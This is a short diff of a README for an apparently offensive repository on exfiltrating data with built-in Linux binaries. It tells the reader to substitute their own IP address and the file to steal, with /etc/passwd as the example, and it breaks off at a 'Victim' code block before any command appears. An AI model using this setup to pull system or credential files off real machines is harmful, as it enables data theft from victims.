RoqueNight/Data-Exfil-with-Linux-Binaries/README.md

 Data exfiltration by abusing built in linux binaries

 // Replace 192.168.10.10 with your IP

-// replace /etc/passwd with the file you want to exfiltrate
+// Replace /etc/passwd with the file you want to exfiltrate

 Victim
 ```